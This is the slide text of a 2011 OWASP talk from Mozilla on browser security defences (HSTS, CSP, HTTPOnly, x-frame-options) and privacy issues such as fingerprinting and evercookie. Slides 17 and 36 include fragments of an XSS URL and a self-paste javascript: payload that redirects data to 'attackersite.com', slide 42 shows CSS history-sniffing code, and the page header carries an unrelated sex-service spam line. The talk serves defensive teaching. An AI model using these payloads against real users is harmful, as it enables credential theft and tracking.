The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Enabling Browser Security in Web Applications

  • 1. Enabling Browser Security in Web Applications August 25, 2011 OWASP Michael Coates - Mozilla Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. About • Michael Coates • Senior Manager, Mozilla • Lead of Infrastructure Security Team • mcoates@mozilla.com • http://blog.mozilla.com/webappsec/ • http://michael-coates.blogspot.com • @_mwc OWASP 2
  • 3. Agenda Locking Down SSL/TLS Stamping Out Cross Site Scripting Socio-Technical Attacks Privacy OWASP 3
  • 4. Fake certificate attack targets Facebook users in Syria May, 2011- theregister.co.uk How to Hijack Facebook Using Firesheep October, 2010 - pcworld.com Locking Down SSL/TLS Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers June, 2008 - wired.com Internet traffic was routed via Chinese servers U.S. military sites included November, 2010 - washingtontimes.com OWASP 4
  • 5. Risks of Insecure Communication High likelihood of attack Open wifi, municipal wifi, malicious ISP Easy to exploit High impact to user Clandestine monitoring of population Injection of incorrect/malicious content No protection from any defensive systems Design flaw in application OWASP 5
  • 6. Insecure Session Management Secure login over HTTPS Fir esh Att Password submitted encrypted ack eep Immediate redirect to HTTP Session ID sent cleartext <-- vulnerability point !!"# !"#$"%&' !"%3*+%"' https://site.com/login ("&'("%%)*+,-.'//012' !"#$"%&' ("%%)*+,-.'//012' http://site.com/profile !"%3*+%"' OWASP 6
  • 7. Insecure Redirects User requests HTTP page, response redirects HTTPS 302 Response is HTTP <-- Vulnerability Point mybank.com !"#$$%%&%&&'()*+,-./'$ 012$3"456".#$ 7/.*#5/+%$$%%&'%&&'()*+,-./'$ !"#$8##9:%&&'()*+,-./'$ !!"# 211$;/<+4$ OWASP 7
  • 8. Secure Design for Communication HTTP Strict Transport Security (HSTS) Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): All communication over HTTPS No insecure HTTP requests sent from browser No option for user to override untrusted certificates OWASP 8
  • 9. Strict Transport Security Browser prevents HTTP requests to HSTS site Any request to site is “upgraded” to HTTPS No clear text HTTP traffic ever sent to HSTS site Browser assumes HTTPS for HSTS sites !"#$$ '!(!# $%%&%&&'()*+,-./'$ !"#$0##12%&&'()*+,-./'$ !!"# 344$5/6+7$ OWASP 9
  • 10. Cookie Forcing HSTS also protects against Cookie Forcing OWASP 10
  • 11. HSTS FAQ Is HSTS Cert Pinning? No Chicken and the Egg Technically, but drastically less chance of attack Certificate Rotation Problem? No - HSTS forces valid certificate, doesn’t specify which Browser Support Current: Firefox & Chrome https://www.owasp.org/index.php/ HTTP_Strict_Transport_Security#Browser_Support OWASP 11
  • 12. Protecting Outdated Users HSTS supported in current browsers (Firefox, Chrome) Older browsers all support SECURE Cookie Flag SECURE cookie flag Instructs browser to only send cookie over HTTPS Much less (and different) protection than HSTS, but good defense in depth control OWASP 12
  • 13. Secure Flag SECURE Flag doesn’t prevent HTTP requests like HSTS Just removes SECURE Cookies from HTTP request !!"# !"#$"%&' !"%()*%"' +"&'+"%%,)*-./'00123' +"4$5"' !!"# !"#$"%&' +"%%,)*-./'00123' !"#$"%&' 666' OWASP 13
  • 14. Defensive Design HTTP Strict Transport Security http://tools.ietf.org/html/draft-hodges-strict-transport-sec Set SECURE flag for cookies Secure application design for TLS https://www.owasp.org/index.php/ Transport_Layer_Protection_Cheat_Sheet OWASP 14
  • 16. Risks of XSS Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004) Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page Business Impact: Compromise of user accounts False data displayed on website Remote monitoring of user actions with website Full attacker control of content displayed and served from website OWASP 16
  • 17. XSS Example (1) Attacker submits malicious code javascript Name:_____ submit (3) Malicious site steals passwords & installs malware (2) Code is now part of webpage Login: ___ <div class="featured"> <form action="/en-US/firefox/ Pass: ____ users/login" method="post" id="login" class="featured-inner object-lead"> submit to evil site javascript <div> <input type="hidden" <install malware> name="data[Login][referer]" (4) Attacker spreads malicious URL http://site.com/?a=%3cscript%3edocument%2e OWASP 17
  • 18. Frustrating Problem XSS issues can occur anywhere user data is used in a webpage Difficult to identify all output locations Many frameworks allow design patterns that lead to XSS issues OWASP 18
  • 19. Content Security Policy (CSP) CSP - New defensive control to eliminate XSS Name:_____ Allows web site to specify where JavaScript can be submit loaded from Injected JavaScript via XSS is CSP Policy rendered inert X-Content- Violations & potential XSS Security-Policy: attacks are reported to web allow 'self'; img- site for investigation src 'self' data: OWASP 19
  • 20. XSS Example with CSP (1) Attacker submits malicious code javascript Name:_____ submit (2) CSP prevents script execution (3) Site safe to use <div class="featured"> <form action="/en-US/firefox/ users/login" method="post" id="login" class="featured-inner object-lead"> Name:_____ javascript <div> <input type="hidden" submit name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" /><input Violation report sent to site.com/CSPalert OWASP 20
  • 21. Implementing CSP Some code changes needed to externalize JavaScript Run CSP in report only mode to test Enable CSP and protect users with browsers supporting CSP Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users OWASP 21
  • 22. CSP Violation Reporting Violations of CSP policy reported to specified URL Acts as XSS intrusion X-Content-Security-Policy: allow self; report-uri http:// detection system reportcollector.example.com/ collector.cgi CSP supported in portion of site users, XSS IDS benefits all Reported data is from client, trust accordingly OWASP 22
  • 23. CSP Violation Reporting CSP Violation javascript Report Includes: HTTP Request Violation report sent to request-headers site.com/CSPalert blocked-uri violation-directive original-policy OWASP 23
  • 25. Other CSP Benefits Prevent ClickJacking via frame-ancestors Control embeded frames via frame-src Control domains for images via img-src Control target domains via xhr-src Enforce specific protocols (https://*.foo.com) Future enhancement to control actions & malicious forms OWASP 25
  • 26. Protecting Outdated Users HTTPOnly mitigates one of XSS impacts - session hijacking Supported in all recent browsers Easy, opt-in security control to protect users Attacker’s Site javascript Cookie: SessionID OWASP 26
  • 27. Defensive Design CSP gaining traction, potential to solve pressing web security risk HTTPOnly flag - easy setting to add additional layer of defense OWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/XSS_ %28Cross_Site_Scripting%29_Prevention_Cheat_Sheet OWASP 27
  • 29. ClickJacking Attacker includes victim page in iframe & overlays opaque layer Attacker’s image image entices click and text Victim Site interaction Clicks are registered on victim site underneath Attacker’s Overlay User inadvertently performs action at victim site OWASP 29
  • 30. ClickJacking Example Click the Bouncing Ball Click to follow Joe [ ] Grant Joe full profile access Confirm OWASP 30
  • 31. ClickJacking Defenses x-frame-options header Full solution Compatible with new versions of browsers Frame Busting Scripts Partial solution Compatible with older browsers OWASP 31
  • 32. x-frame-options Additional header for HTTP/1.1 200 OK HTTP Response Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-Encoding Instructs browser to Content-Length: 35236 disallow framing x-frame-options: DENY Two options - DENY, Text SAMEORGIN HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-Encoding Content-Length: 35236 x-frame-options: SAMEORIGIN OWASP 32
  • 33. x-frame-options Targeted site not display if framed Victim Site Attempted Error page displayed ClickJack Prevents ClickJacking attack Attacker’s Overlay x-f-o Result OWASP 33
  • 34. Frame Busting Scripts JavaScript within page to detect framing Will either “bust” the frame or not display content <script> if (document.top!= document.location){ document.top= document.location} </script> Not optimal solution - techniques available to bypass defense OWASP 34
  • 35. URL Social Engineering “Cool n ew hid den fe ature” ” our game gems for y “Get 10 free Click the square and type the secret combination ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter OWASP 35
  • 36. Danger of those keystrokes... click square - selected text element ctrl a - select all text ctrl c - copy text javascript:.... ctrl l - select location bar javascript:var ctrl v - paste text xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("G enter - execute JavaScript ET", document.location, false);xmlHttp.send();xmlDoc=xmlHt tp.responseText;var str=xmlDoc;x.replace(/somesite .com/, "attackersite.com"); document.writeln(x); OWASP 36
  • 37. URL JavaScript Before Pasted JavaScript has full control of username:_____ page password:_____ submit Can rewrite page somesite.com Extract and send any data After No indication to user username:_____ attackersite.com password:_____ submit OWASP 37
  • 38. Defense Code Change to Browser Remove association between javascript: & loaded document Renders attack inert OWASP 38
  • 39. Your Android Phone is Tracking You April, 2011 - pcworld.com Your iPhone Is Tracking Your Every Move April, 2011 - readwriteweb.com Privacy Mobile-App Makers Face U.S. Privacy Investigatio April, 2011 - online.wsj.com Nissan car secretly shares driver data with websites June, 2011 - theregister.co.uk/ OWASP 39
  • 40. Privacy Business gains from gathering user data Privacy infringement based on laws Privacy concerns based on user expectations Need better options for user to understand collected data, control flow and accessibility of user data OWASP 40
  • 41. Browser Profiling Panopticlick Fingerprints browser based on provided information Plugins installed Font Support Screen Resolution Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Time Zone Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information. OWASP 41
  • 42. CSS History Sniffing Determine user’s browsing habits with CSS Visited link different than Visited Link non-visited link Unvisited Link CSS and element inspection determines visited pages if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") { Issued fixed March 2010 // link.href has not been visited } else { // link.href has been visited } } http://dbaron.org/mozilla/visited-privacy OWASP 42
  • 43. Evercookie “Its [evercookie] goal is to • Standard HTTP Cookies • Local Shared Objects (Flash Cookies) identify a client even after they've • Silverlight Isolated Storage removed standard cookies, Flash • Storing cookies in RGB values of auto-generated, force-cached cookies (Local Shared Objects or • PNGs using HTML5 Canvas tag to read pixels (cookies) back out LSOs), and others.” • Storing cookies in Web History Multiple methods of storing & • Storing cookies in HTTP ETags data on client • Storing cookies in Web cache Could be abused for unauthorized • window.name caching • Internet Explorer userData storage tracking • HTML5 Session Storage Goal to keep user in control of • HTML5 Local Storage data storage / tracking • HTML5 Global Storage mechanisms • HTML5 Database Storage via SQLite http://samy.pl/evercookie/ OWASP 43
  • 44. Do Not Track Adds header DNT: 1 to all web requests Tells websites user does not want browsing activity to be tracked http://dnt.mozilla.org/ OWASP 44
  • 45. Permission Manager Granular management options for user interaction with sites Control Location Settings Cookie Settings Popup Windows about:permissions Offline Storage OWASP 45
  • 46. Privacy Design Privacy controls distinguish applications Design with privacy in mind Growing support for DNT OWASP 46
  • 47. Closing Defense In Depth Many new security controls to enhance security Strict Transport Security Content Security Policy x-frame-options Do Not Track OWASP 47
  • 48. Thanks! mcoates@mozilla.com @_mwc OWASP 48

Hinweis der Redaktion

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n
  8. \n
  9. \n
  10. \n
  11. \n
  12. \n
  13. \n
  14. \n
  15. \n
  16. \n
  17. \n
  18. \n
  19. \n
  20. \n
  21. \n
  22. \n
  23. * request\nThe HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.\n* request-headers\nThe HTTP headers that were sent resulting in a violation of the Content Security Policy.\n* blocked-uri\nThe URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the cast of frame-ancestors\nviolations; in that case, you should assume the blocked URI is the same as the request URI.\n* violated-directive\nThe name of the policy section that was violated.\n* original-policy The original policy as specified by the X-Content-Security-Policy HTTP header.\n
  24. \n
  25. \n
  26. \n
  27. \n
  28. \n
  29. \n
  30. \n
  31. \n
  32. \n
  33. \n
  34. \n
  35. \n
  36. \n
  37. \n
  38. \n
  39. \n
  40. \n
  41. \n
  42. \n
  43. \n
  44. \n
  45. \n
  46. \n
  47. \n
  48. \n